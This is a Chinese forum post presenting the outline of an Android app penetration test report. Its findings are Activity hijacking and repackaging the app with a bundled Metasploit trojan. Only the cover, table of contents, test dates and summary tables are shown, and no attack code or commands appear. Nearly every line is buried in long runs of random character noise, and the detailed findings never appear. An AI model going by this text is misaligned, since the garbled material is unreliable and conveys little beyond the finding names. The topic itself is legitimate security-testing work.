找回密码
 立即注册
查看: 5476|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
" U8 T2 A0 V2 X1 O0 D1 @ , x$ c* F: m. }6 b! M( q" ^

$ s$ W( h8 B% u/ S" L7 ?( K4 ~% n5 r" \& ?" x
1 M6 Q ^; A; d+ f) x ; z5 \9 o2 |. W& d; W5 a

2 k$ u5 [& V6 s! B+ H ! A J& |: W" i" `% ?( t+ D' j
# O2 |5 f! {8 {( b$ P ; b0 w. E) E: D Z- H Y* s/ B

0 h- Z; N2 V5 u7 x5 C: f 3 x/ a9 @" k/ y$ a6 t+ ` 文档编号:                - ^* W# i( K' Q8 G, {0 M 5 o+ D* c' ]" A

% m* c6 J, A* K # L* M3 @1 z& j, z) O

* S/ x$ X+ L9 ~/ d3 X 6 B8 T0 e8 i v( @ \. ^   $ Y& D! A4 s- w& B) ]8 U 8 Z$ d0 z' L2 B: ~' S

+ d% v6 A8 Y8 U# R n3 x. P . Z! l2 Y$ {! z5 ?

. Y Z& z+ W' }. }% B: t1 |& U; e. q( \4 a, F. g" K   1 H0 ]/ C% g9 ]+ G$ B- Y) C; l# ?: `& Z3 a+ Y& ]+ f7 X8 B' R

( |8 l6 z# d; c: _% g3 R" q2 l2 E

1 d5 {# @3 A s- b' h9 B1 Y 2 t6 X6 M9 w. p: w8 L" y) J   1 r g# i% z; b$ A* z$ y $ P% v- x/ V) r" `

2 {) Y o2 K7 F6 p 3 ?5 M1 |1 j2 ?' k3 U) u- j+ M

) A! R# E5 b$ {* N 5 _, g7 V$ _8 I* v, q" ^$ R   # ^# j [# \8 ^3 L) s% k/ ` 1 E8 [5 [' Z. R4 L- H% \- z+ t

1 b! K5 {9 w3 N; E9 e# K. s9 A; x2 s" M6 H" M7 v

( } a5 G3 U6 i, ?7 ~ 5 d6 d7 N+ U1 Q   ! |) m. C9 Y4 m$ c/ A/ l . h* D! I; k0 ~& {; w: E

* t" O# d% m* J. M* P & n9 j( J: B+ d; u

, J6 ^! }& T' E2 _0 g. j0 n# @5 D$ p 某某某APP渗透测试 ( U9 i+ c( X/ F3 a' C& ] $ p: z; V3 h- w" w6 O' E. j

" H! T! x5 `- q9 U$ w( U( d9 [ 2 I, Q3 }: Z6 B- f, q( S

Q0 P8 v5 k- I: x8 t9 q! h 9 J! i6 k3 s' Z* F8 \! V2 q+ v   ( L: P9 a4 ]) ?9 E. a, x / r, `; V- _. z, p3 m) j

1 e: _$ U' V" F" O- D5 \$ @1 l4 ~ ( _ p' L3 \! `" E2 _4 t$ x

1 H' Y3 ]& L) s" m/ T* p+ @7 E# d( |1 z, C1 k$ w   & E; u$ ^; \2 H# A" C! M9 R . U y. o- z H. i \

$ q% F% o3 c1 `5 w; ?+ W$ o 5 B! \7 Y& J( D5 Y

% G$ \% u t5 o4 y* q/ S' I' D. l! d0 u. ^1 j+ j   * y2 `( h, W" Q: k 6 f' V3 S; t7 d9 j+ H

( Y$ y; U! q8 P; w8 | 2 b2 ^4 U$ N8 h3 ?8 a0 j

7 [2 f7 U7 E/ N" f, k. Q1 x+ A$ F. |6 k; W3 I* N, ]   1 n+ a3 C+ @8 b$ u& f/ w1 @- l7 C0 q

% k0 S1 @9 |3 c# D+ w+ ? . @5 g. |' o# L$ H# m0 C

% S# H n5 m0 r- ? : a; F v! @" V& V% Y% S 技 术 报 告 + H: N5 {8 S# C4 N/ T; u % I( c1 A& l2 b$ k, m% Y

6 t7 ^- j! O. ~" O2 r" h3 W4 k: t6 k. ], l% N

, `. t. \4 }+ I8 b q$ }' k3 a6 I7 c; O   " c) K0 f& ^# u8 m9 d% d% [ , Z: K( y4 k5 e# E

+ U/ ~" s5 N) S! _$ ?' K9 d' M ! ~8 g$ G+ j2 n

0 u4 T% d2 j+ _' M% E4 U N: n, E0 x; H! W2 _   . }& Q+ O6 I6 f Q 8 a" x5 R# ~5 r4 S

! \ {3 \6 X1 E( B& P4 Z ; r# A& F' F: B o$ I. y K

! e: Q$ R# G! w2 @+ T 6 i$ Z. [7 b0 o7 R7 Q0 a! R   8 W; [# _1 M# a; o! R . O8 t8 I. Q- Z! b7 k4 m5 z

) N. a$ @5 O) K- i6 _3 `+ r , V: ~2 }/ I2 H$ p( l6 L

! p5 y9 T7 y2 D8 ~9 | ' J) Y4 D. ?. X/ a9 K$ _   ! A. @+ K3 G: h . m: ?7 F6 Y: R% h

2 |. v: I5 U, B! W3 U % x# P0 b9 e( S

* t6 Q& n1 ~, ?! e. e7 T5 w1 ]$ z" O/ m0 u6 K/ Y& t   ' d/ B1 O. n/ |# I w' o 9 t# y9 U& e5 _5 m& v0 K m

- w1 E' @8 `; \4 S" m % \& J f! H! X' K4 @

$ s' y& U/ A/ I k2 `2 c3 }7 E6 s1 Q9 H- p3 {/ w! q   9 m: i6 S" H) z' _ f2 Z% q) k5 [2 ~: G% }

; V/ l" \0 y5 E( B, ?6 y+ ? 5 r: O1 U3 s) [* h

' |* g u# A; R* v, O; \ h & ^& w. v g. p6 E- @. d   ' F/ Z( U V7 i, V7 K" x . J2 `! d& o# z) Z. b1 D g

( h$ P; O' Z7 u; r( r1 L2 o$ K5 j# f/ e1 z+ A: ~

# B0 m$ w7 G% w# x1 J: I; h" g# z. {! W4 w   * G# f; g, U8 h; }! j 5 U' U% B) T& A; G9 h. r! E3 K

8 m) m( E/ j0 |; B ( {& B' [, s6 H; O4 C

) }2 X' |( t8 I/ R* L5 }6 i6 I. y1 Z) O$ I6 O   3 U- D; M2 m5 Q ; z+ W( k, e4 R

' f8 C8 K! Q3 i& s # S& E9 @; o4 f' q( Z8 ^- c

" U, w. U* x8 d' e 3 E- F- n" r, [6 R0 z   " W4 L7 v; c5 _8 B; y& l$ ?. W% r 2 O4 M4 |& F( q+ Z9 R. T( _

! u7 I) V7 q8 X0 ]- X. T5 l: j. l& q; F0 I

6 v, l [2 H+ n* u% X2 x% I( b $ l5 J( R2 ?6 V   0 N% V, i2 P9 _! F( @: u; n5 \. j$ Y3 G( D1 @

; C7 _$ \3 m1 P0 C4 a. |/ @4 A! e! M

( @8 I3 @" @4 R4 d4 d n9 G* ?: }$ P, }   ( ~, H$ P: D4 P [: K- b. }$ p8 l* c. `6 F) X0 n

5 ^! p5 Y' A" j 4 V% q \( A$ W

: V/ o. R) m' s3 t7 x 4 _$ a8 z: o3 u$ G   2 W0 B! z/ J }4 c% ?5 d % q+ H; V6 W, S6 q

4 R! q$ J" G' c# x, v( j1 w ; c' i. a' f( g8 J, H+ C

1 g& u4 a8 w6 y4 i2 Q( M3 J( g # m% u+ {7 P ?# A* }- ^4 \* a" ~2 {   9 E* p/ {9 Y% V8 U$ @5 T4 R: Y% K' z; _+ ` i6 M# d

2 A1 r' i5 Y2 Q' d5 p0 U+ ^2 A# I+ o4 z1 {

* K* m9 r8 A2 M( _+ d : m' i& E' n, E: O$ `9 }   9 g. ~4 a9 ~! |) [4 @( y' h2 @% P+ p3 \9 X

0 ~: p4 n7 b$ s r: n+ Z 2 g( X2 Z/ z! } p, q6 n! |

- @/ |! u* q( ?. T: j * w" U7 A3 K8 @   - U1 Q' i* W. ^! w/ q5 O& d! T* [0 K" {

: t& h3 b; d- i8 f% t6 k) T+ [ 6 I6 p! `& g& |+ Z. p5 R0 T& _9 g

# g* y, @4 f' i$ N% H, b9 d2 q ) R9 ~: @+ x/ N8 J, L- S   6 z$ w# Z4 ~* X/ G. ~9 O1 ~ \; \* y1 P; p6 s& B

9 y Y) a% g9 B) w 2 B2 h- ?/ G5 H3 T

1 R; E; m, d" ]* p K 2 }" q0 b% N o   ) @- v& v, G) K- V- J 7 p% v- q" i8 w+ x& u- h8 ~

. C$ N# {5 W, t( Q. A- b f6 ^! r. R- s. b0 f1 |

3 k }6 a- H7 y2 J C) ?- j7 N) y; A0 f. Z8 y- p/ ~/ Q 二〇二〇年 $ z: y8 D7 @4 l$ E7 ? {/ F0 U% L ) s P( j$ j- W2 _7 W, j

. C! d! K0 J* h; n4 S, Y8 B1 c* _- Q( N. F# \% u& [: L
$ E9 U+ w0 N' M, O : T2 j M) p) _0 \
/ P0 A' R* h% e; L" V3 E " p3 M4 u) u0 K i+ j* q4 M
# W9 O. V) |. ~% z" T* ? , [" c; j' C# S6 o7 H" q
3 r/ T" V. \3 s6 u 2 O; ?# u8 Z% Z# `* ~
5 B( _6 }2 R/ n2 T6 A5 V" n3 _# d* t, {
8 S* ^- y* m& t% q5 c1 w - |. u; V# \: c" F
' |1 v! e! w" Z U6 E0 Y/ h Z5 z* G
9 F1 D7 S: m2 a - [$ V, C* M' D# x& o

4 N, m% H1 q% k# F2 q 3 T2 u- J; ^8 g( i# T 目 录 8 w* J7 D# p) H9 r1 Q) V) h1 M3 J ' q3 B+ K6 ~9 l' S# J" k( s

' ^3 J9 S3 h' K) E, |8 c1 }- t1 K6 c/ z2 |) e* O # y) Y- n, I/ H7 Q ! i4 {; R3 ]( A9 s& s

) q+ m& N6 e4 t3 i: Y {4 m: F' U& |; s( B5 X& P   7 g1 ^! S# {+ c0 K/ A: X6 [/ p # v t% H$ j4 N' A% _- E6 r3 z a

' L1 e* ?& h2 @2 R& ]8 h' r* W+ U . i% [$ h4 B( L0 Q$ D6 Q

5 z: W$ _8 B) N H5 E" l- \- f; ^* k; G; M' d8 C3 i; | 1 概述... 3 ( ]1 e2 {( H' c! A z0 v' Z' y4 _) C& _/ J" }: x5 S$ p/ `/ V

( X( Z7 N. M! l- p+ E6 E 6 Q+ _; M/ y1 `* ~: K

: n) s8 i% R8 x& M1 d3 q$ x7 p6 v) L ) _, F. U% [: P! X7 p 1.2测试时间... 3 # Y* ^0 D7 |) p' }$ T 2 Q' c. y/ ~, i, M' K5 z; v

5 N: v* Z# r- W1 ^* ^ 5 Z) K8 L* Z6 {3 a" r- X0 p" O8 J

# y" F$ C! _ y 1 B" V5 w; A2 X6 c 1.3测试对象... 3 / I+ X8 n" m$ o r " z6 {# f9 \: E5 U y

2 w: K/ j. z- L, L) E- ^3 v + f" d8 H: K( D

. ^# G" S3 g" x3 Q! J# F+ J; y% X 5 U e; s# y5 a$ } 1.4测试结果... 3 , W1 W, x6 n) z) \4 _4 a: V# d# c/ @4 p9 W& ]5 I+ m

}0 ]; }/ S* T) d* F% y- {& b7 m ; e6 W$ |, @* u! D2 [

) {# G3 Y) d$ p/ I 8 [: S p8 a1 ^* t4 E" e, M 2 检测结果... 4 8 t6 ~8 w: ]1 B. F4 R! q% X4 [+ S8 v9 D$ R$ X* K0 u- n

" F% j- ^) h) @5 t+ _$ n4 ~% D

! D' V1 f8 y5 r8 M2 J* c! V( J/ c: U7 O 2.1 某某某... 4 0 j. `7 t* l+ d , W# y! p* O3 v" `! J: P

7 d; s/ L* K# ~9 P8 o 6 @! |/ C ` D! U* p& G

' N5 h# I9 q. k4 t5 j1 G' l8 R4 J 9 b* ?% ^9 s+ U2 A: t' x 2.1.1检测目标... 4 3 _$ C+ Y5 |; D. m" c0 d6 b2 s; n$ v4 L0 Z2 G/ ?5 H5 ^

+ o' ^7 P" ?' {! h 1 N" R, `4 I! f, d% k* l& P5 F. {" [

u1 `- f5 |2 I( O8 V, k/ A+ m% h) c 2.1.2检测结果... 4 1 X8 o9 z$ f+ P) g * q {( u8 u# A. c% R

5 q0 M0 U" {3 y8 k( s: f. [4 v1 Z3 X, N/ b6 G3 I* g2 x& d! Z( D. x& ]

- h! O& r9 q( A8 ?+ ]6 {6 L3 [" E 3 D- O6 G5 O3 \ 2.1.2.1. 4 5 G, Y) |: C. r* q' l8 d) \ ( w" `& U% L% n: V, O. f: S, E t( ^

% _! p+ s8 W# {# q " k, ?5 d6 W3 g

: J6 B8 M7 H4 L: \0 A1 k / c0 R* {" i1 D 2.1.2.2. 6 2 \8 h# I' \% C3 t # z# N# n4 `" y. W+ N6 l7 o

6 D1 ~* G. \8 C# P' `) L) [ & F" s, L- u9 A

/ j5 J! c% [' K( ? I; w3 ]- X% ^ : ^. b* A- ]9 t) v # W4 E! r) G! h+ D& h % s" |5 T' ~& ^3 }

; j. f9 e1 n; U: l/ }" J4 d4 I# [; W6 I/ Z& u, ~4 W. }
+ \# k% T: l% i5 S6 l; t {1 u( U+ E% C. l
" [& a: A3 D I( |' \$ I; A/ X4 a& ^ : ]) Q i( M) @! ?. p A) T
z% I' Z, f: A- D2 l: E6 i % M, `* ]& L, O+ e, u9 S& L6 B
J8 N7 X$ D' K8 ]1 |! V . L @4 D& N( v9 J" C A

5 X8 T( L* k, R8 f2 T. I/ A% B* Q+ r7 M3 H8 X6 @. o% T. ] 1 概述 % F G5 G3 _' U% q% ~ 3 P; f! B1 `1 M

: I5 q8 ~& s( |3 p - l Z# k/ q/ H$ u9 S

$ U1 J% e; s, ~: g* N+ y2 N# e( j2 A1 v0 ` 1.2测试时间 3 S f8 |9 v+ i! }+ b) } 3 M* e" U# @" \1 i

" R0 u3 t' a4 s0 w E: t2 T# F+ ]. q ( u5 p# V$ j. J k! B( `1 M, q1 V* i0 `0 t1 c% x9 i: K7 @% Y2 z3 w- r/ N4 v: ^2 Y8 Y% H, p. j0 t0 M, B2 b7 s) Q% W# n/ m2 q; z' Y" w+ b1 G0 O9 Q: [4 J2 a% t' H: R- l4 c# L' {& |2 G/ | O, f% M, r5 W% I& K# X9 d' W9 k( I- J* u3 c* ]- X J% F) Q, f" E* p: T6 }# O: c f1 p/ S L; z% U- Z) q# Q _8 W4 g x2 t3 y: @8 N0 h/ j) { h& Z* G) v4 I) B' P9 w3 a3 ?# k! |# U0 A7 @' ?! b2 ?8 H& Y# \- ^6 n$ A) f$ |7 c" G( {# V+ o& |9 Y. {, i& ~- b" O8 [% ]& c# T& s7 _5 Q# \% T5 b; S# G: L$ X1 Q# I4 }# ~6 ^2 H( [, S' X) P2 z8 w2 l7 Y, t8 F+ o4 @2 ]3 b- N+ E' U. J+ ~; R0 ]" x$ d+ ]8 O1 C9 M6 P! w& z9 m2 h. W7 x7 S: ^+ I/ r2 M4 v" q* T, ?/ U8 U% S d e$ U( |: i, L
0 R% {/ C( t& _ _" o3 f( o 2 N7 e1 R1 H }3 U

+ \ z. c6 r( E# O } 6 U% V+ l" m2 e1 [ 渗透测试时间 5 s* e! b4 k8 F- H: W1 D K6 e0 O, `4 [! o

0 n7 o/ U3 _' X% z; n) |) ^- l # r& v# O {( t0 I# F3 ?
; d9 e7 }. V5 N0 v' }8 w! u ' q* t3 p5 m% V# l

: J( B' \* s% H0 \2 ?4 P , q4 {) A; u1 C 起始时间 # i2 }7 k' u3 M+ V+ F1 I 6 b/ S2 m' y9 v" ?# j5 y

8 `2 t# U5 X* s' s; v6 a2 m 4 Z& @: a6 b; x& I3 l; S5 F
6 O' F: }, ]% j% |" V! {4 p. H( B% B* C9 n; ]# J

1 a5 H: }6 I t p ' w- j$ N. N1 t7 j3 _ 202046 7 b! v! Z: n* @" V1 M u& T : `9 c; \. v# X% u

6 V& t3 e: t) `4 [0 k1 G ! ?' X$ [: p: u- X; J3 K" [, K x# x
6 B8 S2 g8 V2 X- Y* L+ l ; {" f/ s* ^+ e% P0 x) z5 |, `# x

3 _0 R |0 |4 [( y1 e+ @0 Z% [% [- o 结束时间 1 z" W# q0 s- n+ b. _$ m# X* B" G* o L z3 e: x: s ~

) A! c* i2 N1 ` V* w3 ^1 |! P: m
' v5 s9 Q9 R! a6 \ 7 u8 f# r0 {: J8 z

% Q3 v) Y* ]7 r2 j7 b0 U , |6 L: }* n* R& W 202049 3 S2 g8 N, p9 [; _% v1 R $ } T5 d% l, {) b& a! g7 k' f

! V* B# M% C# J9 L( W6 n* f 4 |, a8 Q" z( n. m0 _' ?
4 q1 f) ^7 j3 n0 W/ j$ |3 i. t7 d. @) Z, R

' t/ X: A6 N0 T+ C' j 4 T: ]8 T2 B8 v4 @ ] 1.3测试对象 , ]: W# `3 W* A% l1 d 3 u+ F& I& ^, t1 L

) ^- i4 Z4 Z3 V4 [3 D; f , o% A8 F" j8 \# `- r/ C! D3 [( o. j

4 Q& d' S8 q) H # z0 g- L- U9 l 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: # ^& q! {6 }( j$ V& G7 {& Q3 a1 H. W. C; @8 F0 A- Z

) d' K: y; {* W5 d& X/ E8 p4 S5 L - f2 i( d* O; Z2 T

& d# M0 G/ `( F+ u+ R 4 K* e, F- m" d1 u( E5 a3 P8 r* k- o 1-1 检测对象 / J h( e* d) D2 w6 n& \$ @ : ~5 L0 B2 |8 |6 Y

3 S' N, n- k4 r3 ^! ?* c / w+ T+ `6 e% S5 M: _ 2 V+ e0 e3 }0 |! {9 X: b# w; m( X$ B6 J# z, q0 n/ Y$ J# S& H) h6 o3 m* S3 K2 ]4 |/ T! P9 j. G& ^8 ^9 P. o, r0 D1 A* B0 b2 ~& E, L8 C9 r# Y8 E( S6 q$ e0 A, o' k* c) h; w. T& p0 ?5 j* M, F( v5 A* X' h) q% k5 O O& l" Y! T! Y# D0 ] W9 b3 M( a- o) ` I2 @1 l( `" z& R7 n) }* W( W: P( l: h; V& `# L5 e' r$ h1 h" P" y5 s( i1 k" g! t) p5 \ }- N: d1 O/ e( R3 D6 I7 j* {, N9 K, Y8 O* t% C5 q5 i, f3 k l8 W. K$ q0 U! ]0 W, F% w5 B! I% x! n* x$ a& P4 c6 ]; {. {5 B8 v7 q7 M; Z: j. J2 m! y5 R/ w' d* l- T4 T$ @5 a! d$ c0 C; u; G, k$ W5 I0 _0 A: g" u/ U2 y s' c2 ^0 I1 p8 h3 |2 P9 r1 G4 [, E/ f$ Z. e3 {" }/ R: p4 y; B( P! _7 r: }: e" `( ^( Z+ ]9 E( h1 [6 D% g. v, U4 |2 Q/ V! s& J
5 y) W7 |! g8 C& |: s% ?; s2 q- c2 t, y8 E5 L0 P% b; m: e7 c

3 ^, b/ b! a3 H ' e: G9 Y/ x) k 序号 ! Z/ x; q1 S7 _; f6 O E% W% B6 \2 X0 q2 ?$ j r8 O1 W

5 L% ]. J$ F" G3 l1 |6 A4 S4 ^7 v9 F5 i, _; @. x- N2 w' m1 n
: V3 g* C; u# U: |' A4 @/ ~) V , b/ K& @( G) e: E( C* s

) a/ ]3 b" L2 l% R% G% |6 L* J # d: c9 o& e; b- O2 i" {" y | 测试对象 - A; B f- |! _. U9 b " |9 l- c: |/ P; \# X% A1 w

4 F: w0 f: q: D# ? O# e 3 Y6 ?' P# N- s* U; @9 c
: [' N" e9 L* Q4 r& f% f# \3 ^3 y! ] n$ o

3 _* {6 W1 Q }* h! h . Y# W% X6 l& l) n: c 测试地址 1 d }) \. j, d4 u4 n+ y8 I3 H9 H) l& f* d

: p" h$ \6 b6 d5 _% Q& U 3 N' H: ]- {' Q3 ~9 w
; p6 j) Z Y. D8 X8 Y; ]: V8 K1 z9 ] k

6 G6 L7 l2 a: L S7 F' q" b* h4 w* ~8 r& o2 ~ B# ]9 [ 安全漏洞 ' S8 N( c2 }! k, Z 1 w( J4 f8 X3 F5 y

3 o H u- e( [8 @5 O ( B4 c- {: F. S: q" B( |8 T D/ G
; R+ D# W2 u- M+ U- r/ A; l 3 k$ T$ O" w; f6 K, n

) ~% |' [0 A+ e b: x8 O) H/ H) J4 y 1 * F/ Y" s! l; x$ v' r ~' b! S1 s % k/ y& u6 ~3 `/ w3 h/ R

; T: t, D& k1 r* f! b% V l1 C/ P ; R2 k9 d3 X$ l9 j8 g
3 U0 {: m3 B8 r, M- U8 | 8 I( Y6 R/ w6 j0 i0 z c4 f) O

% c/ V6 }! P/ O/ ~7 ~9 {% `6 i/ @8 X# K0 S3 F& m# H' @! N& k 某某某安卓APP ( B3 [& D1 C" ]8 r $ M2 k: ~# O; i- y# P

$ c- U: r3 ^8 S# o) a! r& _ # Z! _: a6 w0 i' S( c0 s; i
9 A! j1 B! g- M& \3 C8 o: Z% G; E' b" Y8 F9 K

. Z U, C/ b @+ G* N- d/ w : D$ a; v9 V( x& r ~   ! X! m* s' H/ r " l2 N8 I8 O. ]7 R) G

+ E. |. c) d* y$ N 5 K# q' Q: ?. @; U) J: M; l. ~
9 ?2 m/ h5 R n% u" ~4 m* ? ( a. e6 P# K) T/ h o( h

3 p9 X2 X( _: }7 O 3 u7 O& i4 K( D4 J' w* r 2 * ~4 `! Y; T" `' s5 T) T* a0 G% ?% j& ~; s8 a* D/ G, N' L7 Q0 N

Q# m* ?; t% b7 H- x6 w$ R E, f; Z; r. l9 ^
1 h- q8 D. @) O: T* v0 J' G2 P 7 m8 ~+ T- h: I5 i3 ~0 x6 v

: { l8 j( M" ]; _ V0 r3 L; j + z. U; {) q% U1 [; E: R8 J 1.4测试结果 1 x! ]2 b/ U3 e7 d# b# S: s - u9 r( [1 q; M% i( S1 K6 m+ M

3 \7 V! K; @( X7 L4 G - m" y+ q; M+ Y8 F- ~" D

/ s% D: {5 D0 s4 R6 i! Z9 a1 c, |# t. ~6 | k* `. W 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: " H# j2 Q+ r( o# \3 `* f : f, D8 s: T' p4 Y. ]" C

( Z0 {, s- S- m( Q0 }/ k: G+ h+ Y 0 ?3 h7 s. V& M5 }& u3 \& \

3 }# z* z, I0 ~! }1 w- @5 J) F4 f V% I& K4 ~! \8 l% [3 U" X   ( o; [* F2 l4 `% ~" W/ ~ Y6 D9 g + w9 n' ]. d- H/ `! j3 W8 [& N/ O

! ?( v1 v' w$ W8 t$ }# V) f4 k# J5 [ $ W- W7 Y4 b3 S/ k& x: T) q
+ T" Q( C/ U* H7 u" }3 i" X7 ?# B+ c, n) y! n& M " r1 s( R/ v1 Q+ f$ B, C3 Y4 E2 l7 R" q0 t5 _( O$ j- @9 J4 ^& q6 s3 m" V9 R. f6 Y$ @9 o0 G4 S9 f) A3 S+ ?) X0 M" t7 p q9 G, o6 ^2 ]/ e* v: a+ J' ]9 p: {+ A9 b4 Y% |. V8 \& A: W" m" h+ g, v0 m9 B: w$ O; M, C$ a, a/ T" T, V) p' d% b7 s, Z3 N. }- g- v3 }% g N$ N$ _6 G7 \5 \7 J3 O5 d/ y, g s" d- J2 C; X9 p: O8 A" `# k& I) g- [1 j4 U0 |; S* |- X1 A; V( Z8 i& k g+ F; Z- G7 b6 `2 \" t. e( t# L3 s$ N0 @1 K' F. N% C* F8 M1 L) d1 _: Q& K& J/ T4 b" e9 n. E1 c2 z, {$ D- k7 ~/ X/ @/ }; `5 O. G: i2 j+ I( X5 c4 K8 P9 X9 o. h; p9 i6 G3 V6 A8 K1 k9 m+ v' n+ W6 Y2 h0 M' f8 F8 |2 m. ^8 b' p6 _; T0 P& ?2 n/ d, v* S; g. e. |$ [, w0 M2 T. U( ?; I# _' }: g, a9 R* ]" `# f- g1 ^# D1 g h8 y) l( p- ^! h% o' N5 B* w1 r& e1 M2 z5 A8 c: N* E7 b& x8 [6 H- u1 h( h C0 e" R1 z7 ^# p P" f4 f9 C; U* }9 ]' D, W2 p9 l3 `- |: U) S, z* p+ x; o* L& s0 _ h, r; I( [) B" f5 d. A$ O- ]3 d' Z' J) y1 K b7 _! K9 n- `+ B) p% |3 ~5 i$ v% p' l, ^! ]$ `8 P+ x/ ^6 g" ^; Z) H5 s# L& H4 I w8 x9 ^3 T. t2 e% J. M) v1 A( J) S; d' b: t3 b( }7 G9 Y6 {; t2 o6 ?1 J0 v7 [: b z: y" d" p* w$ x$ f6 v. E% s% { I9 ~) g9 y% Z3 u4 z% v1 ? H) ]+ r8 x4 z9 Q, v+ Z3 k' }& Z2 M! e1 w" B
4 x4 j* G5 c- h3 C3 V0 K5 ]6 H1 I9 d: u ( q& k9 ^$ S* \( c( G

, D% ~3 ~8 X+ v9 ~' F3 v # J/ d b: v3 x2 w1 S, S- q 序号 ' U& a3 \3 @3 e- H j- \ ' @* D" e' a5 q9 N% R) `

& Z. `* |7 T& u X- U- z5 B; V6 ], [ w4 \0 @+ T
5 l' b* ] s/ v- y 4 }; E% m6 K& Z+ L0 J

/ |2 Z- M, A( _% m3 b + u0 y+ }' T( z5 E1 ~9 } 系统名称 5 C- K1 U) X! ^) X. D7 W ; z- e' a- m3 o0 |" ~. `9 w

$ o/ o2 `, Z5 ^; h# B % h5 Z1 ]- q* \: }+ i O
0 N6 _3 h7 M# \; d; W # f0 f1 e- Y. m# q) j

6 E3 D) g. {( T$ m, t ) J3 ^8 {0 E. H) [4 V& ^4 a 漏洞名称 . D4 N' C, s* e+ \: [; e# D9 n% {2 v

0 K; O! i$ C1 m0 C2 C , k! a/ M; o+ D8 `; f& D) ~ y' I& c
% y. M% @6 M: q2 ?' k4 B , K) q3 q. d/ L$ c! W

' S: X3 ~( l; E+ j' J" D# P 1 n& b' P9 F+ {! G" U/ ^ 漏洞危害 / u8 G4 R8 q3 g$ R+ E2 [9 m8 F" p* G* s3 Y( T- m& y( U) O

# ?1 D' I5 T3 s / \3 C# `- \% S# T! d! H
5 ] n' E6 {# F2 U$ U ' ^+ J1 ]% u6 q( O

: V5 D( l9 @8 {! A $ _5 a( g' z1 h+ K. ] 修复结果 " Z3 H4 N) c1 `7 J5 E, o # ]5 d$ @4 k$ f0 h5 p) V

& o8 c2 ^) K$ j: | P( @6 W. ~' X( B9 B: e' p, u4 h9 P4 S
/ f! _/ V2 z1 r( p/ P; T ! c" R0 O* s F6 I6 b/ @+ u; C( }& K

! c0 x1 c) }8 f* V, E0 y' z: K # U% a/ t0 p+ K0 H 1 / U r/ V6 ^( M ! V1 h* s" [5 `

. i2 [- g) s' g/ O* ]: f 6 j! v5 L; b J
) e9 |/ a. r1 s5 a% n7 H$ P * a5 M9 k0 f4 E

/ d" ~) X; |' G# K+ h/ e5 Z 2 R! y0 W, U: J3 C1 x1 ]) u 某某某某某某APP 6 x4 V U; J$ u, r2 Z- h* ?+ p' |0 |( b# r$ _

\, q# x) z* M [8 ]! k) ]* N ' ~7 T( `3 Q! w+ J0 W
+ p" _8 b9 U( a+ Q * M+ U6 p1 M) Y+ s3 B

" P, A* s4 M+ Y( X$ {/ @2 P 5 c- L( g0 a; T: Z0 N& B Activity 劫持 ' n0 S1 o( r2 {+ R) O) {, R; n 7 U x# X9 h/ `* P+ ]

0 Q1 |: p$ w+ _+ \3 q 1 b' T- C! ~$ ~' H# h: y8 H6 \# s

5 v; n& l& t' p4 ^* g + d/ N, ]( t2 u* h1 K7 S   3 d1 [3 f8 h [9 L8 u. Q2 ` K# h' |, h! B' `9 k

9 S% K& \2 a$ \1 U. E: \7 h2 G # j$ u! }0 M+ `
O7 i" Z% R3 i0 j: h5 E 6 M( ~: `3 |$ v9 x# Y

% R1 d8 h6 C- }7 \- s) x: Q. r; H : I: {- f; E7 @) ?' ~( N; @ 4 `1 S r- F( L ) o- p+ `; v% R2 Y# _/ y+ g

$ _# B* f) x6 n, E6 c/ T- ]/ \! K$ m
* y3 R$ y5 c Z+ t& { * X* e. u0 L8 S% a* h }

5 k' H& ~4 g! U, }' D* F/ E) Z2 | ' h( w- W3 G6 b2 D0 b1 z$ q2 B: [   + @. Y; u) U; ? S$ ^7 s0 u 3 M% A: B+ H3 ^5 D( [0 ], `! {

6 e, c* U8 w$ O7 O, c4 t. v( E( A- N5 w8 U
; R) Y7 G! _' l6 ^' O0 m- K % @$ p: Y- A2 v' [1 o

# S/ @$ ]3 m7 L 1 K( |7 `+ { ~ 2 % D) h( y- t; }7 h! o: E( }' b5 L + F" o2 \3 W3 R2 Y

) x. W) T1 l5 Y 8 J4 d4 s1 O4 i& t2 H0 q
4 y) m( k) r; l7 c8 t0 u: \ . ]2 n* g, t" F* [3 X& |

! k. ?% m, x1 }8 m7 J$ K# k* b+ f7 k# P: }) S. y( k9 M 某某某某某某APP 0 [- C* R+ N' x" v9 B : G! B' R: y. \) f! B

1 G% {3 l* g' n8 S8 ]" G. ?; `8 |) e+ O' W- E9 B& |( F( T
: i5 }1 o& @/ T" T) R; I! ~) X5 H2 d, y8 R X

. D7 |: N1 N! Y" { ! |& F8 z' ?+ ~4 t; Z 反编译二次打包捆绑木马、篡改APP代码 , b) Y4 n& [1 N. L/ _+ f: e ' M9 h0 l* Y6 c# E: r/ ~

, Q# L- y8 p- q7 o% j ' W \* @& n. e7 z& D7 W. ^- V
" [' o$ g/ G2 Z: F0 U1 s8 b7 e8 O/ f# i0 k3 A, S! E2 T$ h: q1 \3 z

" `# J" A2 y5 w$ d9 X D$ P1 C ( O+ ] E. w% q ' v) l+ n) U) b0 S9 A% h8 o- L2 s+ g7 k7 f) V* a* @/ q

) N8 O! i m* g! t3 S; `: l* s# ]7 J* N+ m" N3 x# U
8 U; t9 ]2 t. e5 B0 [* A- P/ W - z5 }; u) `* ?9 I" n! R. ^

6 |5 w9 H( t' q: ?+ } ( b6 J1 j5 ~5 H   * a1 v, H0 B# `3 X$ n9 T4 [ E2 p4 p / V6 U% e# X4 \7 D

3 `# W4 R1 J' D/ n! W: \$ X; S, Y$ X. n
: ?( s- E4 U9 E6 E3 \# S9 m+ E 0 |- P" C& S2 O+ [1 X8 P) v0 D- G
+ \0 S. o( o, H0 L. X, o6 ^/ J 3 `( r" j, m$ v; X! ?7 u/ T

+ c! p' J. a) k4 c8 J6 w+ w# q: R + T C/ T( r# Z* N* p, v/ ~   # S) F8 K% H, K# J& p- o g( g8 V, E1 p: ]

, G' X( j) ^8 T; g% k % n( D# Y, f$ V, }# L7 A5 k0 |( p' j

4 U& w3 S5 ^3 J! G0 v4 } , L5 K3 a G6 r3 v. K0 {( \ 1-2 测试结果 0 g0 D8 f4 h" A: w2 \6 D9 o - C8 Q! Q5 s* z+ e% ~2 C8 j

